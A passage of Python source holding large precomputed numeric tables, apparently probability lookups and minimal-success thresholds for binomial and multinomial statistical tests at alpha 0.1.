0.275: 0.06229194601078976, 0.276: 0.06255076691801634, 0.277: 0.06280987397338685, 0.278: 0.0630692678896992, 0.279: 0.06332894938251532, 0.28: 0.0635889191701748, 0.281: 0.06384917797382073, 0.282: 0.06410972651739967, 0.283: 0.06437056552768416, 0.284: 0.06463169573428154, 0.285: 0.06489311786967034, 0.286: 0.06515483266918098, 0.287: 0.06541684087103565, 0.288: 0.06567914321635825, 0.289: 0.06594174044918945, 0.29: 0.06620463331649956, 0.291: 0.0664678225682073, 0.292: 0.06673130895719456, 0.293: 0.06699509323932473, 0.294: 0.06725917617345606, 0.295: 0.06752355852145142, 0.296: 0.06778824104820663, 0.297: 0.06805322452166121, 0.298: 0.06831850971281445, 0.299: 0.06858409739574531, 0.3: 0.0688499883476261, 0.301: 0.06911618334873397, 0.302: 0.06938268318247667, 0.303: 0.06964948863540682, 0.304: 0.06991660049723834, 0.305: 0.07018401956087042, 0.306: 0.07045174662238612, 0.307: 0.0707197824810849, 0.308: 0.07098812793950916, 0.309: 0.07125678380343634, 0.31: 0.07152575088192321, 0.311: 0.0717950299872978, 0.312: 0.07206462193520236, 0.313: 0.07233452754459807, 0.314: 0.07260474763778418, 0.315: 0.07287528304041406, 0.316: 0.07314613458153059, 0.317: 0.07341730309355458, 0.318: 0.07368878941234251, 0.319: 0.0739605943771658, 0.32: 0.07423271883076066, 0.321: 0.07450516361932857, 0.322: 0.07477792959256262, 0.323: 0.07505101760367115, 0.324: 0.07532442850939472, 0.325: 0.07559816317001775, 0.326: 0.07587222244939851, 0.327: 0.07614660721498685, 0.328: 0.07642131833784976, 0.329: 0.07669635669267517, 0.33: 0.07697172315780416, 0.331: 0.07724741861525855, 0.332: 0.07752344395075124, 0.333: 0.07779980005369812, 0.334: 0.07807648781727695, 0.335: 0.07835350813839569, 0.336: 0.07863086191775942, 0.337: 0.07890855005986012, 0.338: 0.07918657347301983, 0.339: 0.07946493306940684, 0.34: 0.07974362976505, 0.341: 0.08002266447986961, 0.342: 0.08030203813769611, 0.343: 0.08058175166629386, 0.344: 0.0808618059973792, 0.345: 0.08114220206666058, 0.346: 0.08142294081384127, 0.347: 0.08170402318263831, 0.348: 0.08198545012083736, 0.349: 0.08226722258028256, 0.35: 0.08254934151692636, 0.351: 0.08283180789082699, 0.352: 0.08311462266620714, 0.353: 0.08339778681143724, 0.354: 0.08368130129909428, 0.355: 0.08396516710597787, 0.356: 0.08424938521310864, 0.357: 0.08453395660580112, 0.358: 0.08481888227364158, 0.359: 0.08510416321055453, 0.36: 0.08538980041478683, 0.361: 0.08567579488898139, 0.362: 0.08596214764016047, 0.363: 0.08624885967976403, 0.364: 0.0865359320236927, 0.365: 0.08682336569231888, 0.366: 0.08711116171051607, 0.367: 0.08739932110768468, 0.368: 0.08768784491778941, 0.369: 0.08797673417936844, 0.37: 0.0882659899355753, 0.371: 0.08855561323420916, 0.372: 0.0888456051277254, 0.373: 0.08913596667328731, 0.374: 0.08942669893276224, 0.375: 0.089717802972796, 0.376: 0.09000927986480035, 0.377: 0.09030113068499687, 0.378: 0.09059335651445141, 0.379: 0.09088595843909883, 0.38: 0.09117893754977441, 0.381: 0.09147229494223763, 0.382: 0.09176603171722476, 0.383: 0.09206014898043888, 0.384: 0.09235464784261732, 0.385: 0.09264952941954734, 0.386: 0.09294479483209815, 0.387: 0.09324044520626536, 0.388: 0.09353648167316578, 0.389: 0.09383290536911687, 0.39: 0.09412971743564406, 0.391: 0.0944269190195053, 0.392: 0.09472451127274187, 0.393: 0.09502249535270467, 0.394: 0.09532087242208949, 0.395: 0.09561964364895584, 0.396: 0.09591881020677938, 0.397: 0.09621837327448969, 0.398: 0.09651833403647817, 0.399: 0.09681869368265199, 0.4: 0.09711945340848228, 0.401: 0.09742061441499439, 0.402: 0.09772217790885732, 0.403: 0.09802414510238132, 0.404: 0.0983265172135625, 0.405: 0.09862929546613368, 0.406: 0.09893248108958946, 0.407: 0.09923607531921358, 0.408: 0.09954007939613327, 0.409: 0.09984449456734855, 0.41: 0.10014932208577966, 0.411: 0.1004545632102829, 0.412: 0.10076021920570839, 0.413: 0.10106629134293674, 0.414: 0.10137278089891696, 0.415: 0.10167968915669329, 0.416: 0.10198701740546645, 0.417: 0.10229476694061598, 0.418: 0.10260293906374693, 0.419: 0.10291153508273282, 0.42: 0.10322055631175478, 0.421: 0.10353000407133751, 0.422: 0.1038398796884129, 0.423: 0.10415018449632063, 0.424: 0.1044609198348933, 0.425: 0.10477208705047297, 0.426: 0.10508368749596653, 0.427: 0.10539572253088365, 0.428: 0.10570819352137661, 0.429: 0.10602110184029956, 0.43: 0.1063344488672443, 0.431: 0.10664823598856697, 0.432: 0.10696246459746714, 0.433: 0.10727713609401288, 0.434: 0.10759225188519075, 0.435: 0.10790781338494819, 0.436: 0.10822382201425752, 0.437: 0.10854027920113521, 0.438: 0.10885718638071207, 0.439: 0.10917454499527934, 0.44: 0.10949235649431968, 0.441: 0.10981062233457517, 0.442: 0.11012934398009516, 0.443: 0.11044852290226946, 0.444: 0.11076816057990178, 0.445: 0.11108825849923756, 0.446: 0.11140881815402805, 0.447: 0.11172984104559078, 0.448: 0.11205132868283442, 0.449: 0.11237328258233543, 0.45: 0.11269570426838246, 0.451: 0.11301859527303189, 0.452: 0.11334195713615819, 0.453: 0.11366579140549511, 0.454: 0.11399009963672858, 0.455: 0.1143148833935199, 0.456: 0.11464014424756157, 0.457: 0.11496588377864335, 0.458: 0.11529210357471631, 0.459: 0.11561880523193852, 0.46: 0.11594599035472929, 0.461: 0.1162736605558398, 0.462: 0.11660181745639499, 0.463: 0.11693046268597888, 0.464: 0.11725959788265967, 0.465: 0.11758922469309523, 0.466: 0.11791934477254173, 0.467: 0.1182499597849514, 0.468: 0.11858107140302623, 0.469: 0.11891268130827812, 0.47: 0.11924479119108941, 0.471: 0.11957740275078407, 0.472: 0.119910517695687, 0.473: 0.1202441377431809, 0.474: 0.12057826461978641, 0.475: 0.12091290006121841, 0.476: 0.12124804581247554, 0.477: 0.12158370362784898, 0.478: 0.12191987527107043, 0.479: 0.12225656251530974, 0.48: 0.12259376714328658, 0.481: 0.12293149094732167, 0.482: 0.12326973572942887, 0.483: 0.12360850330134049, 0.484: 0.12394779548463959, 0.485: 0.12428761411078311, 0.486: 0.124627961021199, 0.487: 0.12496883806734783, 0.488: 0.12531024711081143, 0.489: 0.1256521900233532, 0.49: 0.12599466868701625, 0.491: 0.1263376849941603, 0.492: 0.12668124084758633, 0.493: 0.12702533816057304, 0.494: 0.12736997885698464, 0.495: 0.1277151648713401, 0.496: 0.12806089814888133, 0.497: 0.1284071806456874, 0.498: 0.12875401432871114, 0.499: 0.12910140117589755, 0.5: 0.1294493431762619, 0.501: 0.12979784232994518, 0.502: 0.1301469006483328, 0.503: 0.13049652015414506, 0.504: 0.13084670288147476, 0.505: 0.13119745087593734, 0.506: 0.13154876619470057, 0.507: 0.13190065090662206, 0.508: 0.13225310709230625, 0.509: 0.13260613684422873, 0.51: 0.13295974226678015, 0.511: 0.1333139254764025, 0.512: 0.1336686886016622, 0.513: 0.13402403378335564, 0.514: 0.13437996317458453, 0.515: 0.13473647894087462, 0.516: 0.13509358326026316, 0.517: 0.13545127832339895, 0.518: 0.13580956633363708, 0.519: 0.13616844950714427, 0.52: 0.136527930072998, 0.521: 0.13688801027328987, 0.522: 0.13724869236323353, 0.523: 0.13760997861126137, 0.524: 0.1379718712991265, 0.525: 0.13833437272202093, 0.526: 0.1386974851886771, 0.527: 0.1390612110214796, 0.528: 0.13942555255657146, 0.529: 0.13979051214395583, 0.53: 0.14015609214763355, 0.531: 0.14052229494569438, 0.532: 0.14088912293043793, 0.533: 0.14125657850848247, 0.534: 0.1416246641008996, 0.535: 0.14199338214330975, 0.536: 0.1423627350860244, 0.537: 0.14273272539413945, 0.538: 0.14310335554768486, 0.539: 0.14347462804172595, 0.54: 0.1438465453864995, 0.541: 0.1442191101075287, 0.542: 0.14459232474577235, 0.543: 0.1449661918577153, 0.544: 0.14534071401553914, 0.545: 0.1457158938072179, 0.546: 0.14609173383668234, 0.547: 0.14646823672391804, 0.548: 0.14684540510512592, 0.549: 0.14722324163286887, 0.55: 0.14760174897616385, 0.551: 0.14798092982066696, 0.552: 0.14836078686879586, 0.553: 0.1487413228398762, 0.554: 0.14912254047027446, 0.555: 0.14950444251355421, 0.556: 0.14988703174062287, 0.557: 0.15027031093987303, 0.558: 0.15065428291734878, 0.559: 0.15103895049687566, 0.56: 0.15142431652022192, 0.561: 0.15181038384726742, 0.562: 0.1521971553561463, 0.563: 0.15258463394339888, 0.564: 0.15297282252415018, 0.565: 0.1533617240322658, 0.566: 0.15375134142050884, 0.567: 0.15414167766070536, 0.568: 0.15453273574392945, 0.569: 0.1549245186806466, 0.57: 0.15531702950090986, 0.571: 0.1557102712545081, 0.572: 0.1561042470111676, 0.573: 0.15649895986070417, 0.574: 0.15689441291321915, 0.575: 0.15729060929927896, 0.576: 0.1576875521700936, 0.577: 0.1580852446976913, 0.578: 0.1584836900751271, 0.579: 0.15888289151666476, 0.58: 0.15928285225796399, 0.581: 0.1596835755562652, 0.582: 0.16008506469061237, 0.583: 0.16048732296202217, 0.584: 0.16089035369370905, 0.585: 0.16129416023126705, 0.586: 0.16169874594289305, 0.587: 0.16210411421957827, 0.588: 0.16251026847533698, 0.589: 0.16291721214739183, 0.59: 0.16332494869642622, 0.591: 0.16373348160675336, 0.592: 0.1641428143865904, 0.593: 0.1645529505682422, 0.594: 0.16496389370832842, 0.595: 0.16537564738804714, 0.596: 0.16578821521334683, 0.597: 0.16620160081521945, 0.598: 0.16661580784990357, 0.599: 0.16703083999912705, 0.6: 0.1674467009703354, 0.601: 0.16786339449698484, 0.602: 0.16828092433873468, 0.603: 0.16869929428172162, 0.604: 0.169118508138823, 0.605: 0.1695385697498988, 0.606: 0.16995948298204558, 0.607: 0.17038125172989044, 0.608: 0.17080387991581378, 0.609: 0.17122737149026232, 0.61: 0.17165173043198836, 0.611: 0.1720769607483454, 0.612: 0.17250306647555386, 0.613: 0.1729300516790017, 0.614: 0.17335792045351325, 0.615: 0.1737866769236534, 0.616: 0.17421632524401046, 0.617: 0.1746468695994971, 0.618: 0.17507831420565434, 0.619: 0.17551066330896237, 0.62: 0.17594392118712604, 0.621: 0.17637809214942018, 0.622: 0.1768131805369832, 0.623: 0.17724919072313622, 0.624: 0.17768612711373116, 0.625: 0.17812399414744517, 0.626: 0.1785627962961532, 0.627: 0.17900253806524002, 0.628: 0.17944322399393162, 0.629: 0.17988485865567744, 0.63: 0.180327446658469, 0.631: 0.18077099264520646, 0.632: 0.1812155012940707, 0.633: 0.18166097731887176, 0.634: 0.1821074254694106, 0.635: 0.18255485053187898, 0.636: 0.18300325732921507, 0.637: 0.18345265072150788, 0.638: 0.18390303560636884, 0.639: 0.18435441691933233, 0.64: 0.18480679963426472, 0.641: 0.18526018876376166, 0.642: 0.1857145893595442, 0.643: 0.18617000651289878, 0.644: 0.18662644535509104, 0.645: 0.1870839110577722, 0.646: 0.18754240883345613, 0.647: 0.18800194393592007, 0.648: 0.18846252166064992, 0.649: 0.18892414734532698, 0.65: 0.18938682637023913, 0.651: 0.18985056415878246, 0.652: 0.19031536617790407, 0.653: 0.19078123793859408, 0.654: 0.19124818499635504, 0.655: 0.19171621295171193, 0.656: 0.19218532745069095, 0.657: 0.1926555341853225, 0.658: 0.19312683889416116, 0.659: 0.19359924736280187, 0.66: 0.19407276542439827, 0.661: 0.19454739896019313, 0.662: 0.1950231539000885, 0.663: 0.1955000362231294, 0.664: 0.19597805195812434, 0.665: 0.19645720718417137, 0.666: 0.1969375080312527, 0.667: 0.19741896068079068, 0.668: 0.1979015713662402, 0.669: 0.19838534637370456, 0.67: 0.1988702920425144, 0.671: 0.19935641476587196, 0.672: 0.19984372099143724, 0.673: 0.20033221722198943, 0.674: 0.20082191001605193, 0.675: 0.20131280598855258, 0.676: 0.20180491181148238, 0.677: 0.20229823421455562, 0.678: 0.202792779985896, 0.679: 0.20328855597273982, 0.68: 0.20378556908210874, 0.681: 0.20428382628155384, 0.682: 0.20478333459984766, 0.683: 0.20528410112773196, 0.684: 0.20578613301867388, 0.685: 0.2062894374895787, 0.686: 0.20679402182159856, 0.687: 0.20729989336089943, 0.688: 0.20780705951945155, 0.689: 0.20831552777581072, 0.69: 0.20882530567596289, 0.691: 0.2093364008341447, 0.692: 0.20984882093367282, 0.693: 0.21036257372779668, 0.694: 0.2108776670405803, 0.695: 0.21139410876777068, 0.696: 0.2119119068777031, 0.697: 0.21243106941219608, 0.698: 0.21295160448747266, 0.699: 0.21347352029512576, 0.7: 0.21399682510303225, 0.701: 0.21452152725634926, 0.702: 0.21504763517848402, 0.703: 0.21557515737209668, 0.704: 0.21610410242011052, 0.705: 0.2166344789867689, 0.706: 0.2171662958186337, 0.707: 0.21769956174571664, 0.708: 0.21823428568248668, 0.709: 0.21877047662904875, 0.71: 0.2193081436722041, 0.711: 0.2198472959866113, 0.712: 0.2203879428359658, 0.713: 0.22093009357411275, 0.714: 0.22147375764632216, 0.715: 0.22201894459043073, 0.716: 0.22256566403813283, 0.717: 0.22311392571621594, 0.718: 0.22366373944783802, 0.719: 0.22421511515382514, 0.72: 0.2247680628540138, 0.721: 0.22532259266856458, 0.722: 0.22587871481936841, 0.723: 0.22643643963140753, 0.724: 0.22699577753418013, 0.725: 0.2275567390631562, 0.726: 0.22811933486122538, 0.727: 0.2286835756801963, 0.728: 0.2292494723823189, 0.729: 0.22981703594182484, 0.73: 0.23038627744649448, 0.731: 0.23095720809927242, 0.732: 0.23152983921988868, 0.733: 0.2321041822464993, 0.734: 0.23268024873742021, 0.735: 0.23325805037279204, 0.736: 0.23383759895636017, 0.737: 0.23441890641727506, 0.738: 0.23500198481185625, 0.739: 0.23558684632547633, 0.74: 0.23617350327442724, 0.741: 0.23676196810786698, 0.742: 0.23735225340971805, 0.743: 0.23794437190069778, 0.744: 0.23853833644033903, 0.745: 0.2391341600290356, 0.746: 0.23973185581016365, 0.747: 0.2403314370722066, 0.748: 0.24093291725095917, 0.749: 0.2415363099317333, 0.75: 0.24214162885164442, 0.751: 0.24274888790188998, 0.752: 0.24335810113014295, 0.753: 0.2439692827429402, 0.754: 0.244582447108108, 0.755: 0.24519760875728072, 0.756: 0.24581478238846102, 0.757: 0.24643398286857535, 0.758: 0.24705522523614448, 0.759: 0.247678524703978, 0.76: 0.2483038966619244, 0.761: 0.2489313566797009, 0.762: 0.24956092050970227, 0.763: 0.2501926040899815, 0.764: 0.25082642354721935, 0.765: 0.251462395199727, 0.766: 0.25210053556061046, 0.767: 0.25274086134088347, 0.768: 0.2533833894527322, 0.769: 0.25402813701282223, 0.77: 0.25467512134563586, 0.771: 0.25532435998694697, 0.772: 0.255975870687307, 0.773: 0.25662967141564796, 0.774: 0.25728578036293126, 0.775: 0.257944215945903, 0.776: 0.25860499681089555, 0.777: 0.25926814183775904, 0.778: 0.2599336701437952, 0.779: 0.2606016010878805, 0.78: 0.26127195427462435, 0.781: 0.26194474955857344, 0.782: 0.2626200070486076, 0.783: 0.26329774711236986, 0.784: 0.26397799038077596, 0.785: 0.2646607577527068, 0.786: 0.2653460703996925, 0.787: 0.26603394977082295, 0.788: 0.26672441759766086, 0.789: 0.26741749589934827, 0.79: 0.26811320698777924, 0.791: 0.2688115734729059, 0.792: 0.2695126182681659, 0.793: 0.27021636459605924, 0.794: 0.270922835993805, 0.795: 0.2716320563191784, 0.796: 0.2723440497564509, 0.797: 0.2730588408225018, 0.798: 0.27377645437302944, 0.799: 0.27449691560896095, 0.8: 0.27522025008299583, 0.801: 0.27594648370626207, 0.802: 0.2766756427552376, 0.803: 0.27740775387872363, 0.804: 0.2781428441050571, 0.805: 0.2788809408495003, 0.806: 0.27962207192177896, 0.807: 0.2803662655338274, 0.808: 0.2811135503077288, 0.809: 0.2818639552838439, 0.81: 0.2826175099291502, 0.811: 0.28337424414582163, 0.812: 0.28413418827992953, 0.813: 0.28489737313051333, 0.814: 0.2856638299587509, 0.815: 0.28643359049743594, 0.816: 0.2872066869607032, 0.817: 0.28798315205396063, 0.818: 0.2887630189841298, 0.819: 0.28954632147014897, 0.82: 0.2903330937537252, 0.821: 0.2911233706104174, 0.822: 0.2919171873609755, 0.823: 0.2927145798830292, 0.824: 0.2935155846230349, 0.825: 0.2943202386086293, 0.826: 0.2951285794612334, 0.827: 0.2959406454090917, 0.828: 0.296756475300599, 0.829: 0.29757610861805905, 0.83: 0.29839958549179174, 0.831: 0.29922694671465455, 0.832: 0.30005823375696744, 0.833: 0.3008934887818879, 0.834: 0.3017327546612134, 0.835: 0.30257607499161887, 0.836: 0.30342349411142644, 0.837: 0.304275057117819, 0.838: 0.3051308098845464, 0.839: 0.30599079908023513, 0.84: 0.3068550721871839, 0.841: 0.3077236775206872, 0.842: 0.3085966642490721, 0.843: 0.3094740824141966, 0.844: 0.3103559829527036, 0.845: 0.3112424177178285, 0.846: 0.3121334395019754, 0.847: 0.3130291020598767, 0.848: 0.31392946013267803, 0.849: 0.3148345694725149, 0.85: 0.31574448686815393, 0.851: 0.31665927017126166, 0.852: 0.3175789783235609, 0.853: 0.31850367138497404, 0.854: 0.31943341056253666, 0.855: 0.32036825824038817, 0.856: 0.3213082780106422, 0.857: 0.3222535347054343, 0.858: 0.32320409442988757, 0.859: 0.3241600245963502, 0.86: 0.32512139395965584, 0.861: 0.3260882726537293, 0.862: 0.3270607322293416, 0.863: 0.3280388456932857, 0.864: 0.32902268754886954, 0.865: 0.33001233383784195, 0.866: 0.33100786218383216, 0.867: 0.3320093518373427, 0.868: 0.33301688372237925, 0.869: 0.3340305404847731, 0.87: 0.3350504065422603, 0.871: 0.33607656813651987, 0.872: 0.33710911338693283, 0.873: 0.3381481323466401, 0.874: 0.33919371706047996, 0.875: 0.3402459616253203, 0.876: 0.3413049622526002, 0.877: 0.34237081733338237, 0.878: 0.34344362750587093, 0.879: 0.344523495725656, 0.88: 0.3456105273387513, 0.881: 0.34670483015749626, 0.882: 0.3478065145396591, 0.883: 0.3489156934706179, 0.884: 0.3500324826490219, 0.885: 0.3511570005760081, 0.886: 0.35228936864811067, 0.887: 0.35342971125409106, 0.888: 0.35457815587599106, 0.889: 0.35573483319437665, 0.89: 0.35689987719830346, 0.891: 0.3580734253000495, 0.892: 0.3592556184548126, 0.893: 0.36044660128589723, 0.894: 0.3616465222155064, 0.895: 0.36285553360138006, 0.896: 0.3640737918798012, 0.897: 0.3653014577152351, 0.898: 0.3665386961568701, 0.899: 0.36778567680270435, 0.9: 0.3690425739712867, 0.901: 0.37030956688192357, 0.902: 0.3715868398434812, 0.903: 0.37287458245257316, 0.904: 0.3741729898016013, 0.905: 0.37548226269719714, 0.906: 0.3768026078897954, 0.907: 0.378134238314937, 0.908: 0.37947737334708087, 0.909: 0.38083223906674324, 0.91: 0.38219906854181984, 0.911: 0.3835781021239361, 0.912: 0.38496958776079576, 0.913: 0.38637378132577954, 0.914: 0.3877909469657132, 0.915: 0.38922135746822073, 0.916: 0.39066529464976885, 0.917: 0.3921230497662107, 0.918: 0.3935949239469887, 0.919: 0.3950812286550077, 0.92: 0.39658228617383234, 0.921: 0.3980984301243421, 0.922: 0.39963000601279863, 0.923: 0.4011773718129906, 0.924: 0.4027408985847371, 0.925: 0.4043209711317251, 0.926: 0.40591798870156176, 0.927: 0.4075323657317996, 0.928: 0.4091645326448546, 0.929: 0.41081493669652935, 0.93: 0.41248404288216023, 0.931: 0.41417233490523914, 0.932: 0.41588031621383637, 0.933: 0.41760851111052566, 0.934: 0.4193574659425829, 0.935: 0.4211277503789231, 0.936: 0.42291995878221855, 0.937: 0.42473471168447596, 0.938: 0.42657265737574357, 0.939: 0.4284344736166483, 0.94: 0.43032086948677106, 0.941: 0.432232587381485, 0.942: 0.43417040517298744, 0.943: 0.4361351385507812, 0.944: 0.4381276435612516, 0.945: 0.44014881936622124, 0.946: 0.44219961124405294, 0.947: 0.44428101385974056, 0.948: 0.4463940748332428, 0.949: 0.44853989864010696, 0.95: 0.4507196508818678, 0.951: 0.4529345629700977, 0.952: 0.45518593727289863, 0.953: 0.45747515278081924, 0.954: 0.45980367135633604, 0.955: 0.46217304464121944, 0.956: 0.4645849217079045, 0.957: 0.4670410575530351, 0.958: 0.46954332254848785, 0.959: 0.4720937129834131, 0.96: 0.47469436285272015, 0.961: 0.47734755707524595, 0.962: 0.4800557463561398, 0.963: 0.4828215639469468, 0.964: 0.4856478446055499, 0.965: 0.4885376461125343, 0.966: 0.4914942737745481, 0.967: 0.49452130842950337, 0.968: 0.4976226385777961, 0.969: 0.5008024973958326, 0.97: 0.5040655055604257, 0.971: 0.5074167210204681, 0.972: 0.5108616971284513, 0.973: 0.5144065508883955, 0.974: 0.5180580435286398, 0.975: 0.5218236761943078, 0.976: 0.5257118043278883, 0.977: 0.5297317753353202, 0.978: 0.5338940955221816, 0.979: 0.5382106341669483, 0.98: 0.5426948752053159, 0.981: 0.5473622306342155, 0.982: 0.5522304349152825, 0.983: 0.5573200471216728, 0.984: 0.5626550985532288, 0.985: 0.5682639400343021, 0.986: 0.574180368432149, 0.987: 0.5804451518443972, 0.988: 0.5871081376193765, 0.989: 0.5942312358276155, 0.99: 0.6018927595381185, 0.991: 0.6101939464147714, 0.992: 0.6192691432165274, 0.993: 0.6293024734013033, 0.994: 0.6405567501490285, 0.995: 0.653427511088023, 0.996: 0.6685545316863031, 0.997: 0.687086469892058, 0.998: 0.7114599543785525, 0.999: 0.7488112942693539} # skipcq: FLK-E231, FLK-E501 } if self.used_multinomial_test == 'Approx': # Stores the number of minimal successes for the BT with the stated sample-sizes and probabilities self.bt_min_succ_data = { 'num_bt = 1000, alpha = 0.1': [0.00010537719726562501, 0.00053192138671875, 0.0011025695800781247, 0.001745849609375, 0.002434478759765625, 0.0031548461914062496, 0.0038988952636718746, 0.004661621093749999, 0.0054394836425781246, 0.00622998046875, 0.007031219482421876, 0.007841796875000001, 0.008660491943359376, 0.009486450195312503, 0.010318756103515628, 0.011156921386718754, 0.01200039672851563, 0.012848632812500007, 0.013701263427734384, 0.014557983398437509, 0.015418487548828134, 0.01628247070312501, 0.017149749755859388, 0.018020080566406263, 0.01889334106445314, 0.019769226074218764, 0.02064773559570314, 0.021528625488281265, 0.022411773681640636, 0.02329711914062501, 0.024184600830078132, 0.025073974609375008, 0.025965240478515637, 0.026858337402343765, 0.027753143310546888, 0.028649597167968763, 0.029547637939453135, 0.030447204589843763, 0.031348175048828135, 0.03225061035156251, 0.03315444946289064, 0.03405950927734376, 0.03496591186523438, 0.035873535156250004, 0.03678231811523438, 0.037692199707031256, 0.03860324096679688, 0.03951538085937501, 0.04042855834960939, 0.041342712402343766, 0.04225790405273439, 0.043174011230468774, 0.04409109497070315, 0.04500903320312503, 0.04592788696289065, 0.046847595214843774, 0.04776815795898439, 0.04868951416015627, 0.0496116638183594, 0.050534606933593774, 0.05145828247070316, 0.05238275146484379, 0.05330795288085941, 0.054233825683593785, 0.05516036987304691, 0.05608764648437504, 0.05701559448242192, 0.0579441528320313, 0.058873382568359424, 0.05980322265625005, 0.060733673095703176, 0.0616647338867188, 0.06259634399414066, 0.06352856445312505, 0.06446139526367192, 0.06539471435546879, 0.06632864379882816, 0.06726306152343753, 0.06819802856445314, 0.06913348388671878, 0.07006948852539066, 0.07100598144531253, 0.07194296264648442, 0.07288037109375006, 0.07381832885742196, 0.07475677490234384, 0.07569564819335947, 0.07663494873046883, 0.07757473754882821, 0.07851495361328134, 0.0794555969238282, 0.08039666748046884, 0.0813381652832032, 0.08228002929687508, 0.08322238159179696, 0.08416510009765632, 0.08510824584960947, 0.0860517578125001, 0.08699563598632823, 0.08793994140625011, 0.08888455200195325, 0.08982958984375011, 0.0907749938964845, 0.09172076416015637, 0.0926668395996095, 0.09361334228515636, 0.09456015014648447, 0.0955073242187501, 0.09645480346679697, 0.09740264892578135, 0.09835079956054699, 0.09929931640625012, 0.10024807739257824, 0.10119726562500012, 0.10214669799804699, 0.10309643554687511, 0.10404653930664076, 0.10499694824218764, 0.10594760131835951, 0.10689855957031263, 0.10784988403320328, 0.10880145263671892, 0.10975332641601579, 0.11070544433593765, 0.11165786743164077, 0.11261059570312515, 0.11356356811523452, 0.11451684570312515, 0.11547036743164077, 0.11642419433593765, 0.11737826538085952, 0.11833258056640639, 0.11928720092773451, 0.12024206542968766, 0.1211971740722658, 0.12215252685546893, 0.12310818481445332, 0.12406402587890647, 0.12502017211914085, 0.12597650146484402, 0.12693313598632844, 0.1278899536132816, 0.128847076416016, 0.12980438232421915, 0.13076193237304728, 0.13171972656250042, 0.13267776489257854, 0.13363598632812546, 0.13459445190429736, 0.13555316162109426, 0.13651211547851616, 0.1374712524414068, 0.1384306335449224, 0.13939019775390682, 0.14035000610351622, 0.14130999755859436, 0.1422702331542975, 0.14323065185546935, 0.1441913146972662, 0.14515216064453185, 0.14611318969726622, 0.14707446289062565, 0.1480359191894538, 0.14899761962890695, 0.14995944213867257, 0.15092150878906319, 0.1518837585449226, 0.15284625244140698, 0.15380886840820385, 0.1547717285156257, 0.1557347717285163, 0.15669799804687568, 0.15766140747070378, 0.15862500000000063, 0.15958877563476626, 0.16055273437500062, 0.16151693725586003, 0.1624812622070319, 0.16344577026367252, 0.16441046142578192, 0.16537533569336005, 0.1663403930664069, 0.1673056335449225, 0.1682710571289069, 0.16923660278320374, 0.17020239257812564, 0.17116830444336, 0.17213439941406317, 0.17310067749023506, 0.17406707763671947, 0.17503372192382888, 0.17600048828125076, 0.17696737670898516, 0.17793450927734455, 0.17890176391601642, 0.17986920166015702, 0.18083676147461014, 0.18180456542968826, 0.18277243041992264, 0.18374053955078207, 0.18470877075195397, 0.1856771240234384, 0.18664566040039154, 0.18761437988281343, 0.18858322143554784, 0.189552246093751, 0.1905213928222666, 0.191490722656251, 0.19246017456054787, 0.19342980957031353, 0.19439956665039165, 0.19536950683593857, 0.196339569091798, 0.1973097534179699, 0.19828012084961055, 0.19925061035156372, 0.2002212829589856, 0.20119207763672003, 0.20216299438476693, 0.20313409423828255, 0.2041053161621107, 0.20507672119140757, 0.20604818725586072, 0.2070198364257826, 0.2079916687011732, 0.20896356201172006, 0.20993563842773566, 0.21090783691406378, 0.21188021850586064, 0.21285266113281376, 0.21382528686523566, 0.21479803466797004, 0.21577090454101694, 0.21674395751953257, 0.21771707153320446, 0.2186903686523451, 0.21966378784179824, 0.22063732910156386, 0.221610992431642, 0.22258483886718888, 0.22355874633789202, 0.2245328369140639, 0.2255070495605483, 0.22648138427734515, 0.22745584106445454, 0.2284304199218764, 0.2294051208496108, 0.23037994384765764, 0.23135494995117323, 0.23233001708984508, 0.23330520629882945, 0.23428057861328255, 0.23525601196289192, 0.23623162841797002, 0.23720730590820438, 0.23818316650390753, 0.23915908813476694, 0.24013519287109508, 0.2411113586425795, 0.24208764648437636, 0.24306411743164197, 0.24404064941406384, 0.24501730346679823, 0.24599414062500136, 0.24697103881836074, 0.2479480590820326, 0.24892520141601698, 0.24990246582031383, 0.25087985229492316, 0.251857360839845, 0.2528349304199231, 0.25381268310547, 0.25479049682617305, 0.2557684936523449, 0.256746551513673, 0.2577247314453136, 0.25870303344726675, 0.2596814575195324, 0.26065994262695436, 0.26163861083984497, 0.26261734008789184, 0.26359619140625123, 0.26457516479492316, 0.2655542602539076, 0.2665334167480483, 0.2675127563476577, 0.26849215698242335, 0.2694716796875015, 0.2704513244628922, 0.2714310302734392, 0.2724109191894548, 0.2733908691406267, 0.27437094116211114, 0.2753510742187518, 0.2763313293457049, 0.2773117675781268, 0.2782922058105487, 0.2792728271484394, 0.2802535095214863, 0.28123431396484566, 0.28221524047851754, 0.28319628906250194, 0.2841773986816426, 0.2851586303710957, 0.286139923095705, 0.28712139892578314, 0.28810293579101753, 0.28908459472656445, 0.2900663146972675, 0.2910481567382831, 0.2920301208496112, 0.2930121459960956, 0.2939942932128925, 0.2949765625000019, 0.2959589538574239, 0.296941406250002, 0.29792391967773635, 0.2989066162109395, 0.2998893737792989, 0.3008721923828146, 0.30185519409179906, 0.3028382568359398, 0.3038213806152368, 0.3048046264648462, 0.3057879943847681, 0.30677148437500257, 0.3077550354003933, 0.30873864746094026, 0.3097224426269559, 0.3107062377929716, 0.311690216064456, 0.3126742553710967, 0.3136583557128937, 0.31464263916015933, 0.315626922607425, 0.3166113891601594, 0.3175959167480501, 0.31858050537109706, 0.3195652160644564, 0.3205500488281283, 0.3215349426269565, 0.32251995849609716, 0.3235050354003941, 0.32449023437500346, 0.3254754943847691, 0.3264608764648472, 0.3274463806152379, 0.32843194580078483, 0.3294175720214879, 0.3304033813476598, 0.33138919067383166, 0.33237512207031605, 0.333361175537113, 0.33434729003906616, 0.33533352661133187, 0.33631982421875384, 0.3373062438964882, 0.33829272460937887, 0.33927932739258204, 0.3402659912109415, 0.34125277709961344, 0.34223962402344166, 0.3432265930175824, 0.3442136230468794, 0.34520077514648884, 0.3461879882812545, 0.34717532348633273, 0.3481627197265672, 0.34915017700195794, 0.35013781738281735, 0.35112545776367676, 0.3521132202148487, 0.35310110473633316, 0.3540890502929739, 0.35507705688477087, 0.35606518554688027, 0.3570534362793022, 0.3580417480468804, 0.35903012084961483, 0.3600186157226618, 0.36100717163086493, 0.3619957885742243, 0.3629845886230525, 0.36397338867188067, 0.36496231079102137, 0.3659513549804745, 0.3669403991699276, 0.3679296264648495, 0.3689188537597714, 0.3699082641601621, 0.3708976745605528, 0.3718872070312559, 0.3728768615722715, 0.3738665771484434, 0.37485635375977155, 0.37584625244141223, 0.37683621215820917, 0.37782623291016226, 0.3788163757324279, 0.379806640625006, 0.38079690551758416, 0.3817873535156311, 0.382777801513678, 0.38376837158203736, 0.3847590637207092, 